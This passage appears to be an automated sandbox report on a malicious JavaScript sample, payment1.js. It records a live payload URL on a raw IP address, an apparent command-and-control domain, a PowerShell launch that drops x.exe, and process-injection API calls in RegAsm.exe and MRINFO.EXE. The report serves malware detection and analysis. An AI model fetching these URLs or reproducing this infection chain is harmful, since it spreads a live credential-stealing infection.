72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 18 Feb 2025 07:15:55 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 18 Feb 2025 07:15:57 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: wscript.exe, 00000000.00000003.1697035431.00000174E98B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://196.251.92.64/crypt/popo.ps1
                Source: wscript.exe, 00000000.00000002.1935377292.00000174E9C4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://196.251.92.64/crypt/popo.ps1m?
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C65C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0AEF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2992102247.00000000051A8000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dqvcbn.info
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2992102247.00000000051A8000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dqvcbn.info/xqy6/
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0AEF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: wscript.exe, 00000000.00000002.1935377292.00000174E9C4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: MRINFO.EXE, 0000000A.00000003.2302750338.00000000082A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C65C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: MRINFO.EXE, 0000000A.00000002.2990861843.00000000042F6000.00000004.10000000.00040000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2992872250.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2990429324.0000000003296000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

                E-Banking Fraud

                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
                Source: payment1.js | Static file information: Suspicious name
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042CD13 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B635C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B64340 NtSetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B63090 NtSetValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B63010 NtOpenDirectoryObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B64650 NtSuspendThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62AB0 NtWaitForSingleObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62AF0 NtWriteFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62AD0 NtReadFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62BA0 NtEnumerateValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62B80 NtQueryInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62BF0 NtAllocateVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62BE0 NtQueryValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B639B0 NtGetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62E80 NtReadVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62EE0 NtQueueApcThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62E30 NtWriteVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62FB0 NtResumeThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62FA0 NtQuerySection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62F90 NtProtectVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62FE0 NtCreateFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62F30 NtCreateSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62F60 NtCreateProcessEx
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62CA0 NtQueryInformationToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62CF0 NtOpenProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62CC0 NtQueryVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62C00 NtQueryInformationProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62C60 NtCreateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62DB0 NtEnumerateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62DD0 NtDelayExecution
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62D30 NtUnmapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62D10 NtMapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B63D10 NtOpenProcessToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B62D00 NtSetInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B63D70 NtOpenThread
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C4340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C4650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C35C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C39B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C3010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C3090 NtSetValueKey
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C3D70 NtOpenThread
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C3D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C2CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_03079790 NtReadFile
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_03079620 NtCreateFile
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_03079A80 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_03079920 NtClose
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_03079880 NtDeleteFile
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0365FA6A NtUnmapViewOfSection,NtClose
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02152900
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02150A7F
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02150A90
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_021520F1
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_02152100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00418C53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00401000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040E817
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040E823
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00403170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00402930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042F2E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004104A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00416E4E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00416E53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004106C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040E6D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004046FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B4D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BF03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BDF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BF01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B20100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BFB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B6516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BB8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B4C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B2C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B30770
